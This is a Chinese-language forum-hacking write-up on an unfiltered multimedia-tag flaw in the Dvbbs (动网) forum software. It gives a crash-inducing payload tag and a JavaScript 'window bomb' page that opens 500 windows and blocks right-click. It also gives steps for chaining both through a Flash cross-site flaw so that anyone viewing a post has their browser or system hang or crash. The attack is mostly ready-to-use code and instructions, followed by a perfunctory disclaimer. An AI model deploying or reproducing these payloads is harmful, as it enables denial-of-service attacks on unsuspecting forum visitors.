动网论坛多媒体标签未过滤漏洞测试手记
今天在剑鹰看到这个漏洞的说明,就想测试一下,先找了个动网论坛,发贴的内容如下:
{mp=0,0}c:\ddos.rmi{/mp}
..........省去一部分。代码中记得把{}换成[]
经过测试,当贴中包含大概40个这样的语句时,就可以让WIN98内存耗尽而蓝屏。
对于WIN2000可以使CPU使用率达到满负荷,即使及时关掉IE的进程,系统仍然会出现一些不正常的现象,如右键菜单无法正常显示等。
再深入发展一下,结合动网前一段时间可以在FLASH中插入URL来跨站攻击的漏洞,如果我们在FLASH中制向的是我们特制的一个HTML页面,进入后会弹出N个包含了{mp=0,0}c:\ddos.rmi{/mp}语句的动网页面,就可以大大加强炸弹的威力(这么多进程你关那个啊,呵呵~~~)
攻击过程:
在一个动网发一个插入了非法的多媒体标签的帖子----做一个窗口炸弹的HTML页面,将URL指向插入了多媒体标签的动网页面-----将窗口炸弹的HTML页面的URL插入FLASH中---将FLASH发到目标论坛上??????????//这样别人访问了这个插入了FLASH的贴就中招了~~~~
以下是HTML的代码:
html>
<head>
<title>窗口炸弹</title>
</head>
<body>
<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>
<p><!--webbot bot="HTMLMarkup" startspan --><html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
if (window.Event)
document.captureEvents(Event.MOUSEUP);
function nocontextmenu()
{
event.cancelBubble = true
event.returnValue = false;
return false;
}
function norightclick(e)
{
if (window.Event)
{
if (e.which == 2 || e.which == 3)
return false;
}
else
if (event.button == 2 || event.button == 3)
{
event.cancelBubble = true
event.returnValue = false;
return false;
}
}
document.oncontextmenu = nocontextmenu;??// for IE5+
document.onmousedown = norightclick;??// for all others
//-->
</script>
</body>
</html><!--webbot bot="HTMLMarkup" endspan -->
</p>
</body>
</html>
~~~~~~~~~~~~~~~END~~~~~~~~~~~~~~~~~
<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>
把这句中的www.cbhu.net换成你发准备好的插入了多媒体标签的动网页面就可以了~~
此文仅做为技术讨论之列,如果用于恶意破坏,后果将由你自来承担!!
本文地址:http://com.8s8s.com/it/it35833.htm